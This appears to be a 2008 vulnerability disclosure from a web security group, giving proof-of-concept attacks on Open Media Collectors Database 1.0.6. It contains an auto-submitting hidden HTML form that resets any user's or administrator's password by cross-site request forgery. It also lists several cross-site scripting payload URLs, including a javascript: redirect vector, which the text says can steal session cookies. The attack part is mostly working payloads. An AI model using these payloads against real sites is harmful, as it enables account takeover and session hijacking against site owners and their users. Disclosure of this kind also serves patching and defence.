#=======================================================================#
	.____                   _________            ._.
	|    |    ______  _  __/   _____/ ____   ____| |
	|    |   /  _ \ \/ \/ /\_____  \_/ __ \_/ ___\ |
	|    |__(  <_> )     / /        \  ___/\  \___\|
	|_______ \____/ \/\_/ /_______  /\___  >\___  >_
	        \/                    \/     \/     \/\/
			(http://wwwlowsec.org)
#========================================================================#
Author: C1c4Tr1Z
Date: 28/08/08
Application: Open Media Collectors Database 1.0.6 (15/05/2007)
Product WebSite: http://opendb.iamvegan.net/

#========================================================================#
#============================[CSRF]======================================#

We can change any user or admin password by CSRF, only knowing the user's
username.

POC:

<form name="CSRF" method="POST" action="http://www.victim.com/dir_to_opmcd/user_admin.php">
<input type="hidden" name="user_id" value="USERNAME">
<input type="password" name="pwd" value="NEW_PASSWORD">
<input type="password" name="confirmpwd" value="NEW_PASSWORD">
<input type="hidden" name="redirect_link" value="">
<input type="hidden" name="redirect_url" value="">
<input type="hidden" name="op" value="update_password">
</form>
<script>CSRF.submit()</script>


#========================================================================#
#=============================[XSS]======================================#

With some JavaScript knowledge, we are able to execute JS codes to steal
cookies to use the sessions, or another changes/actions.

POC:

/user_admin.php?op=edit&user_id=<img/src/onerror=alert(document.cookie)>
/listings.php?search_list=y&linked_items=include&title_match=partial&title=<img/src/onerror=alert(document.cookie)>
*/user_profile.php?uid=[USERNAME]&subject=No+Subject&redirect_link=Back+to+Statistics&redirect_url=javascript:alert(document.cookie)

(*) This vector modifies the "Back to Statistics" (that we also can change),
and when the user clicks on the link, the javascript code is executed

#========================================================================#
#========================================================================#
Contact:     C1c4Tr1Z <c1c4tr1z@lowsec.org>
		(http://wwwlowsec.org)
	LowSec! Web Application Security (Lab).
		   Deus ex Machina
#========================================================================#